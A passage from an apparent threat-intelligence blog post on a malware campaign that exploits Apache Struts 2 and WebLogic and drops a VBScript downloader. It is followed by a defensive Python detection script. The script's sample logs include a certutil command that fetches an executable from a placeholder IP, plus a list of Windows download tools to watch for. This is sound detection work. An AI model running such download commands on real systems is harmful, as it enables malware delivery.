New Campaign Targeting Apache Struts 2, WebLogic Deploys Malware Using VBScript
- by nlqip
Figure 2: Weblogic WLS-WSAT campaign attempting to download and execute the same Windows executable file
This attempt to download the same file immediately indicated to us that the same attacker was using different exploits in the operation. Unfortunately, these files were available neither from the original server nor from other malware repositories, so they could not be analyzed.
Investigating the IP addresses generating the campaign requests revealed various server systems (Apache Tomcat, MySQL, FTP, and NTP servers), which indicated that these machines were not serving as bots but were probably machines owned or compromised by the threat actor. Most of the servers ran software versions with known exploits, which further strengthens this assumption.
The unavailable malware files, combined with the fact that these were non-bot machines, suggest that this operation is still under development and that a full botnet infrastructure has not yet been deployed.
Spearhead VBScript
While VBScript is commonly used by attackers to lure victims into opening malicious Microsoft Word documents, it is rarely used by attackers who target web servers through code execution vulnerabilities to download malware onto the machine. Those attackers usually prefer PowerShell or other Windows built-in command line tools such as bitsadmin and, for more creative attackers, regsvr32 and certutil, which we described in a previous blog. Once the Struts 2 vulnerability is triggered, the malicious Java payload constructs the VBScript on the fly by creating an empty file in the temp directory and appending the VBScript code line by line.
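The chain described above leaves a simple process-lineage signature on a Windows web server: the Java process hosting Struts 2 or WebLogic (java.exe) spawns a script host that runs a .vbs file from the temp directory, or spawns one of the built-in download tools named above. The following detection logic is an added example, not code from the article: it runs over a few constructed process-creation log lines in an assumed key="value" format (the field names ParentImage, Image and CommandLine are assumptions, not a specific product's schema) and reports which lines match either pattern.

```python
"""Flag java.exe -> VBScript-from-temp and java.exe -> LOLBin process chains.

Added example (not from the original article). Log format and field names
are assumed; sample lines are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Parent processes that host Java web applications (Tomcat/Struts 2, WebLogic).
JAVA_PARENTS = {"java.exe", "javaw.exe"}

# Script hosts that execute the dropped .vbs file.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}

# Built-in Windows tools the article names as the usual downloaders.
LOLBINS = {"powershell.exe", "bitsadmin.exe", "certutil.exe", "regsvr32.exe"}

# A .vbs path under any directory literally named "temp" (e.g. C:\Windows\Temp\x.vbs).
TEMP_VBS = re.compile(r"\\temp\\[^\\\s\"']+\.vbs\b", re.IGNORECASE)


@dataclass
class Event:
    parent: str    # basename of the parent image, lowercased
    image: str     # basename of the created process image, lowercased
    cmdline: str   # full command line as logged


def parse_event(line):
    """Parse one 'Key="value" Key="value"' log line (assumed format)."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))

    def basename(path):
        return path.rsplit("\\", 1)[-1].lower()

    return Event(
        parent=basename(fields.get("ParentImage", "")),
        image=basename(fields.get("Image", "")),
        cmdline=fields.get("CommandLine", ""),
    )


def classify(ev):
    """Return a finding label for a suspicious child of a Java web process, else None."""
    if ev.parent not in JAVA_PARENTS:
        return None
    if ev.image in SCRIPT_HOSTS and TEMP_VBS.search(ev.cmdline):
        return "java->vbscript-from-temp"
    if ev.image in LOLBINS:
        return "java->" + ev.image[:-4]  # strip ".exe"
    return None


def scan(lines):
    """Return (line_index, label) for every line that matches a detection."""
    findings = []
    for i, line in enumerate(lines):
        label = classify(parse_event(line))
        if label:
            findings.append((i, label))
    return findings


# Constructed sample log lines (paths, host names and the 198.51.100.7 address are
# illustrative; 198.51.100.0/24 is a documentation range).
SAMPLE_LOG = [
    r'ParentImage="C:\Tomcat\bin\java.exe" Image="C:\Windows\System32\cscript.exe" '
    r'CommandLine="cscript.exe C:\Windows\Temp\dropper.vbs"',
    r'ParentImage="C:\Oracle\Middleware\jdk\bin\java.exe" Image="C:\Windows\System32\certutil.exe" '
    r'CommandLine="certutil -urlcache -split -f http://198.51.100.7/update.exe C:\Windows\Temp\update.exe"',
    # Same script-host pattern, but launched from explorer.exe: an interactive user, not the web app.
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\wscript.exe" '
    r'CommandLine="wscript.exe C:\Users\bob\AppData\Local\Temp\script.vbs"',
    # Java spawning cmd.exe is worth its own rule, but it is not the chain this example targets.
    r'ParentImage="C:\Tomcat\bin\java.exe" Image="C:\Windows\System32\cmd.exe" '
    r'CommandLine="cmd.exe /c dir"',
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_LOG):
        print(f"line {idx}: {label}")
```

The rule keys on the parent process rather than on the script host alone: wscript.exe and cscript.exe running .vbs files from a user's temp directory is routine on workstations, but a Java web-server process launching them is not, which is what makes the first sample line a finding and the third one noise.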